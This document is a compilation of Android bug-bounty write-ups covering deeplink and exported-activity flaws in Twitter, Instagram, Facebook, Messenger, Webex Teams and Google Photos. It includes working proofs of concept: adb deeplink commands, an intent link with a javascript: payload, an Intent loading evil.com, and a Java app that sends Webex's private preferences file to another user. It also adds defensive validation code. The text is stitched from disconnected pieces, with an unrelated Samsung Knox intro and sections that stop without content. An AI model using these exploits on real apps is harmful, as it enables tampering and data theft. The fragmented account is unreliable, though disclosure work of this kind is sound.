Description: Samsung Knox is a defensive mobile security platform that is built into Samsung devices and enhances security in all directions through a combination of physical means and software systems, providing security protection from the hardware to the application layer.
I used the path and file structure to bypass Samsung Knox protection in an unauthorized manner to read the stored files in the secure folder, and received a Samsung $3750 reward.
Summary: com.twitter.android.lite.TwitterLiteActivity was set to exported, the data passed to the intent was not validated, and its WebView exposed a JavaScript interface (JSInterface) to any URL loaded through this activity; insecure schemes such as file: and javascript: could also be loaded via the intent.
Twitter recently launched Twitter Blue for Android users, allowing them to change the app icon and undo tweets at any time. Twitter for Android version 9.76.0-release.0 implemented some deeplinks for Twitter subscriptions that perform direct actions, and some of those deeplinks were not validated and did not check (via custom permissions or otherwise) whether the user has a subscription, so it was possible to use the change icon, custom navigation and early access features without a subscription using the deeplinks below:
The extras deeplink gives access to change icon and change custom navigation, and the early_access deeplink gives access to features like undo tweets with custom timing.
Steps To Reproduce:
Launch the deeplink below using adb to access the app change flow:
adb shell am start -d "twitter://subscriptions/settings/extras"
Launch the deeplink below using adb to access the undo tweet feature:
adb shell am start -d "twitter://subscriptions/settings/early_access"
Instagram vulnerability description: Instagram for Android has a messaging tool, and users can change message controls to decide whether they want to receive messages from potential connections or other people on Facebook and Instagram.
Instagram's Android app implemented a deeplink "instagram://turn_off_message_requests" that turns off all message requests so the user no longer receives messages from anybody, and this deeplink executes headlessly: there is no UI after it runs.
Thus, a malicious or rogue app could execute the turn-off-message-requests deeplink without any permission such as "FB_APP_COMMUNICATION", and an attacker would have been able to disable all incoming messages for an Instagram user.
In Facebook for Android, the ad creation deeplink "ads_lwi_coupon_interstitial" has the parameter "landing_page", and the URI passed to this parameter was not validated, so any internal/restricted deeplink passed to it was launched when the "Get Started" button was pressed in the UI.
Create an intent using a third-party app or HTML page with the deeplink "fb://ads_lwi_coupon_interstitial/?ad_account_id=1&page_id=216662095206780&landing_page=fbinternal://rninternalsettings&entry_point=home"
In Facebook for Android, the activity "com.facebook.katana.activity.iap.LaunchFromIAP" is exported with the "com.facebook.katana.activity.iap" action intent filter and uses the "CHECKOUTURL" intent extra as the argument to loadUrl without validating the http/https scheme, which could potentially have been used to send a malicious URL to the WebView and execute XSS as well as create a phishing web page.
Vulnerable Facebook app version: 338.1.0.36.118
Static code analysis: in LaunchFromIAP the WebView URL is loaded from bundle "A0I", which is defined in "p000X.C172877z9" as:
public static Bundle A0I(Activity activity) { return activity.getIntent().getExtras(); }
So the LaunchFromIAP activity takes the intent extras as bundle "A0I", reads the value through A0I.getString("CHECKOUTURL"), stores it in "A02" as a string and passes it to the WebView defined in "p000X.C44470KuZ".
Reproduction:
This issue could be exploited in multiple ways:
1. Using any web browser:
<html>
<body>
<a href="intent:#Intent;action=com.facebook.katana.activity.iap;S.CHECKOUTURL=javascript:alert(8);end">Click here
</a>
</body>
</html>
2. Using a third-party app:
2.1: Using the action com.facebook.katana.activity.iap
Intent intent = new Intent("com.facebook.katana.activity.iap");
intent.putExtra("CHECKOUTURL", "https://evil.com");
startActivity(intent);
07/10/2021: Bounty -> $1000 + $75 (Silver league Bonus) Comment by Facebook : “An untrusted Intent containing a Javascript: URL can cause XSS in LaunchFromIAP. The instance of this bug occurs due to not checking if the scheme is http(s). The larger root cause is that SecureWebView should not by-default handle javascript: URLs in loadURL.”
03/11/2021: Fixed in v342 (it now validates the http/https scheme, the host facebook.com and the path "/aas/iap_web").
04/01/2022: Requested disclosure and Facebook agreed to disclosure.
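The fix described above, written out as an allow-list check for a URL that arrives in an untrusted Intent extra before it reaches WebView.loadUrl(). This is an added example, not Facebook's code; the class and method names are assumptions, and the expected host and path are taken from the fix note above.

```java
import android.app.Activity;
import android.net.Uri;
import android.webkit.WebView;
import java.util.Locale;

/** Added example (not Facebook's code): allow-list an untrusted checkout URL before loading it. */
public final class CheckoutUrlValidator {
    // Values from the fix note: only the IAP web page on facebook.com may be loaded.
    private static final String EXPECTED_HOST = "facebook.com";
    private static final String EXPECTED_PATH = "/aas/iap_web";

    private CheckoutUrlValidator() {}

    /** Returns true only for a URL that is safe to hand to the checkout WebView. */
    public static boolean isAllowedCheckoutUrl(String raw) {
        if (raw == null) return false;
        Uri uri = Uri.parse(raw.trim());
        String scheme = uri.getScheme();
        // A missing scheme, or javascript:, file:, intent:, data: etc., is rejected outright.
        if (scheme == null) return false;
        scheme = scheme.toLowerCase(Locale.ROOT);
        if (!scheme.equals("https") && !scheme.equals("http")) return false;
        // Uri.getHost() strips userinfo and port, so "https://facebook.com@evil.example/..." resolves
        // to host evil.example and fails the comparison.
        String host = uri.getHost();
        if (host == null || !host.toLowerCase(Locale.ROOT).equals(EXPECTED_HOST)) return false;
        // Exact path match: Uri.getPath() is not normalised, so "/aas/iap_web/../x" and
        // "/aas/iap_webx" both fail here instead of being loaded.
        return EXPECTED_PATH.equals(uri.getPath());
    }

    /** How an activity would use the check: refuse and finish rather than load anything else. */
    public static void loadCheckoutOrFinish(Activity activity, WebView webView, String untrustedUrl) {
        if (!isAllowedCheckoutUrl(untrustedUrl)) {
            activity.finish();
            return;
        }
        webView.loadUrl(untrustedUrl);
    }
}
```

With this check, "javascript:alert(8)" from the browser intent above fails at the scheme test and "https://evil.com" fails at the host test, while "https://facebook.com/aas/iap_web?x=1" is loaded.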
Facebook Linked Publications ( Authorship or Author Tag ) feature was designed to give journalists more credit and visibility for the articles they were writing, regardless of where they were being published and it resulted in the byline that you saw in many posts, as well as the ability to easily follow that journalist and see when they shared new articles publicly.
A vulnerability in the Cisco Webex Teams Mobile (Android) application could allow a local attacker to access non-sensitive information from an authenticated Webex Teams Mobile user.
The vulnerability is due to improper access handling in the affected software. An attacker could exploit this vulnerability by leveraging the improper access handling through a third-party application on an affected device. A successful exploit could allow the attacker to share non-sensitive information to any Webex Spaces the authenticated Webex Teams Mobile (Android) user has access to.
Affected Version: This vulnerability affected Cisco Webex Teams Mobile (Android) releases earlier than Release 41.5.1.
The Cisco PSIRT has assigned this bug the following CVSS version 3.1 score. The Base CVSS score as of the time of evaluation is 3.3
The Webex Teams app exported the com.webex.teams.crosslaunch.message activity, which is associated with a sharing fragment that shares content to a space or one-to-one chat using parameters and actions like android.intent.extra.STREAM and android.intent.action.SEND.
So any third-party app could use those parameters to share content, because the app failed to validate the path and file, and the caller's permission to it, before sharing.
Steps to reproduce:
Create an Android app using the code snippet below:
import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.os.StrictMode;

public class MainActivity extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        // An empty VmPolicy switches off the FileUriExposed check, so a file:// Uri can be placed in the Intent.
        StrictMode.VmPolicy.Builder builder = new StrictMode.VmPolicy.Builder();
        StrictMode.setVmPolicy(builder.build());
        // Path inside Webex Teams' own private data directory; the receiving activity reads it with its own UID.
        Uri uri = Uri.parse("file:///data/data/com.cisco.wx2.android/shared_prefs/com.cisco.wx2.android_preferences.xml");
        // Explicit SEND intent to the exported share activity, with the file as the stream to share.
        Intent intent = new Intent("android.intent.action.SEND");
        intent.setClassName("com.cisco.wx2.android", "com.webex.teams.crosslaunch.message");
        intent.putExtra("android.intent.extra.STREAM", uri);
        intent.setType("");
        startActivity(intent);
    }
}
Once created, run this app on a device where Webex Teams is installed.
Running the created app opens the Webex Teams app with the messaging window to select a target; select the target user, and the app attaches the com.cisco.wx2.android_preferences.xml file to be sent.
Click the send button and it sends the attached internal file to the target user. This also gives access to /data/data/com.cisco.wx2.android/*, so all files in the app's data directory, including databases, could be stolen.
Note: This vulnerability requires the user to be logged into the Teams app, and only non-sensitive info (some app and OS settings, and cached images) can be shared to other Webex spaces. All sensitive information is encrypted, so no CVE was assigned.
Instagram for Android does not handle some Cyrillic letters like U+043E (CYRILLIC SMALL LETTER O), so if we create a hostname using the Cyrillic small letter о, like the one below, it could crash Instagram:
http://gооgle.com/
Copy the URL above and post it in an Instagram profile or send it to a user in chat.
XSS vulnerability found in Koo App: Koo is a Bengaluru-based microblogging mobile application with 5 million users, which is known as an Indian alternative to Twitter. The Koo app allows users to connect, engage and interact in 13 regional languages such as Bengali, Telugu, Punjabi, Kannada and Hindi, among several others. The application was an instant hit because of its vast language options, as the untapped user base in India that is not English speaking, or wants a platform to engage in its local language, has a lot of potential.
Description: Stored XSS, also known as persistent XSS is more damaging than non-persistent XSS. It occurs when a malicious script is injected directly into a vulnerable web application.
Facebook Messenger for Android reuses the thread ID when invoked via deeplink, which could have let an attacker produce an indirect thread deletion vulnerability.
This can lead to some confusing behaviour on the user's side, one example being: the user has a 1:1 chat with the attacker. The attacker then forces the user to create a new group chat with the same thread ID that is not functional. If the user deletes the chat, the original chat with the attacker also disappears.
So an attacker could use this method to delete the thread between the victim and their friend as well as delete chats from the victim's Messenger, as the victim is not able to leave the duplicate group thread and has only the option to delete the conversation.
Deeplink used: fb-messenger://groupthreadfbid/%s
For automatic redirection using a webpage:
Repro steps:
Messenger app version (Android): 274.0.0.18.120
Create a webpage with the script (replace userID with your userID) and host it:
1. Send the crafted webpage link created from the script to a user with whom you previously interacted.
2. On the victim's phone, click on that link; it opens a blank page and redirects back to the thread.
3. Send a message to the victim, or wait until the victim closes and reopens the app; a duplicate thread ID is created between you and the victim on the victim's phone.
4. Now if the victim sends a message, it shows in both threads.
5. The victim goes to the duplicate thread (group thread), taps on members and taps on admin, and sees "No admin".
6. Now if they try to leave that group, they get an error, so the victim has only one option left: delete the duplicate thread, which is the group thread.
7. Once the victim deletes the duplicate thread by selecting "delete conversation", the original thread is also deleted. This deletion is permanent, as the thread is no longer visible on the web after deletion.
The Google Photos Android app's activity com.google.android.apps.photos.pager.HostPhotoPagerActivity is exported with an intent filter that supports the file scheme, which means a third-party app could use this exported activity to pass a file via a file URI without access validation.
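Both the Webex Teams share activity and the Google Photos file-scheme activity above accept a stream Uri from an arbitrary caller. As an added example (not Webex or Google code; the class, method and helper names are assumptions), this is the gate an exported share or viewer activity can apply to android.intent.extra.STREAM so that the app never reads its own private storage on a third-party app's behalf.

```java
import android.content.Context;
import android.content.Intent;
import android.content.pm.ProviderInfo;
import android.net.Uri;
import android.os.Parcelable;
import java.io.File;
import java.io.IOException;

/** Added example (not Webex or Google code): refuse stream Uris that point back into our own data. */
public final class ShareStreamGuard {
    private ShareStreamGuard() {}

    /** True when canonicalPath is dir itself or lies underneath it (both already canonical). */
    static boolean isInside(String canonicalPath, String dir) {
        return canonicalPath.equals(dir) || canonicalPath.startsWith(dir + File.separator);
    }

    /** Returns the Uri if it may be shared or viewed, or null to refuse the intent. */
    public static Uri acceptedStream(Context ctx, Intent intent) {
        Parcelable p = intent.getParcelableExtra(Intent.EXTRA_STREAM);
        if (!(p instanceof Uri)) return null;
        Uri uri = (Uri) p;
        String scheme = uri.getScheme();
        if ("file".equals(scheme)) {
            // file:// carries no permission grant: the app opens the path with its own UID, so the
            // Webex repro above could name a file under /data/data/<pkg>. Resolve symlinks and ".."
            // first, then refuse anything inside the app's data directory.
            String path = uri.getPath();
            if (path == null) return null;
            try {
                String target = new File(path).getCanonicalPath();
                String dataDir = new File(ctx.getApplicationInfo().dataDir).getCanonicalPath();
                if (isInside(target, dataDir)) return null;
            } catch (IOException e) {
                return null;
            }
            return uri;
        }
        if (!"content".equals(scheme) || uri.getAuthority() == null) return null;
        // A content:// Uri served by one of our own providers is the same private data by another
        // route, so resolve the authority and refuse it when the provider belongs to this package.
        ProviderInfo pi = ctx.getPackageManager().resolveContentProvider(uri.getAuthority(), 0);
        if (pi == null || ctx.getPackageName().equals(pi.packageName)) return null;
        return uri;
    }
}
```

The activity calls acceptedStream() in onCreate() and finishes when it returns null; the file:// branch is what turns the Webex repro's shared_prefs path into a refused intent.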